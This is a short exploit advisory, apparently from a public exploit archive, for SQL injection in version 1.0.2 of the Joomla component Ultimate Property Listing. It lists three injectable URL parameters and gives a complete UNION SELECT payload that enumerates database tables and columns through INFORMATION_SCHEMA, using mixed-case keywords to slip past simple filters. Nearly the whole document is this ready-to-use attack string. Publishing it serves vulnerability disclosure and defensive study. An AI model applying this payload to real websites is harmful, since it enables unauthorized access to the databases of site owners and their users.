# # # # #
# Exploit Title: Joomla! Component Ultimate Property Listing v1.0.2 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://faboba.com/
# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/ultimate-property-listing/
# Demo: http://demoupl.faboba.com/
# Version: 1.0.2
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=[SQL]
# -109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-
# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelocation1_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelisting=[SQL]
# Etc..
# # # # #